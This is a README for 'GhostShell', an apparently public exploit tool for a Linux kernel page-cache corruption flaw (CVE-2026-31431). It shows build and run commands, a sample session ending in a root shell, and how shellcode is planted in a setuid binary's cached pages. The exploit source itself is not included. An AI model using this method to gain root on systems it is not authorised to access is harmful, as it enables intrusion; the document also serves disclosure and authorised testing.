CVE-2026-31431 — Local Privilege Escalation via Linux Kernel Page Cache Corruption
GhostShell is a local privilege escalation tool that exploits a flaw in the Linux kernel's authencesn AEAD crypto implementation to obtain a root shell from an unprivileged user account. It corrupts the in-memory page cache of a setuid-root binary (e.g. /usr/bin/su) by planting shellcode at its entry point, then executes it — gaining setuid(0) + setgid(0) and spawning a privileged /bin/sh. No on-disk file is modified; only the in-memory page cache is affected.
In short: you run it as a normal user, and it drops you into a root shell.
Discovered and disclosed by Theori / Xint. Full writeup: copy.fail
$ ./ghostshell
CVE-2026-31431 'Copy Fail'
Target: /usr/bin/su
Size: 63576 bytes
Entry offset: 0x1a50
Shellcode: 94 bytes (24 iterations)
[*] Checking if kernel is vulnerable...
[+] Kernel IS vulnerable.
[*] Corrupting page cache of /usr/bin/su with shellcode...
[*] Patching offset 0x01a50 (24/24) ...
[*] Verifying page cache corruption...
[+] Shellcode verified in page cache!
[*] Executing corrupted setuid binary...
[*] If successful, you should now have a root shell.
[*] No trace on disk. Only ghosts in the cache.
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#
Linux 4.14 (August 2017) through kernels patched in April 2026.
| OS | Kernel |
|---|---|
| Ubuntu 24.04 LTS | 6.17.0-22-generic |
⚠️ This exploit has only been tested on the system above. Your results may vary on other distributions or kernel versions.
- A vulnerable Linux kernel (see above)
- GCC (or any C compiler)
- Linux kernel UAPI headers (
<linux/if_alg.h>) — usually included withlinux-libc-dev - An unprivileged user account (no root needed to run the exploit)
Install build dependencies on Ubuntu/Debian:
sudo apt-get update
sudo apt-get install gcc linux-libc-devgcc -Wall -Wextra -o ghostshell ghostshell.cNo external libraries required.
Auto-detect target (checks common setuid binaries like su, sudo, passwd):
./ghostshellSpecify a target manually:
./ghostshell /usr/bin/sudoIf the kernel is vulnerable, you will be dropped into a root shell (#).
- Vulnerability check — Creates a temp file, mutates its first 4 bytes via the AEAD primitive, reads it back to confirm the page cache was modified.
- Target selection — Auto-detects a setuid-root binary and parses the ELF64 header to find the
_startentry point offset. - Page cache corruption — Writes 94 bytes of x86-64 shellcode to the entry point, 4 bytes per
patch_chunk()call (24 iterations), using the AF_ALGsplice()in-place decryption flaw. - Execution — Calls
execl()on the corrupted binary. The kernel loads it from the page cache and the shellcode runs with setuid-root privileges, spawning a root shell.
The exploit only corrupts the in-memory page cache. A simple reboot clears it entirely.
To drop caches without rebooting:
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'If dirty pages were written back to disk (unlikely but possible), reinstall the affected package:
sudo apt-get install --reinstall util-linux # for /usr/bin/suThis tool is provided for educational and authorized security research purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The author assumes no liability for misuse.
This project is licensed under the MIT License.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.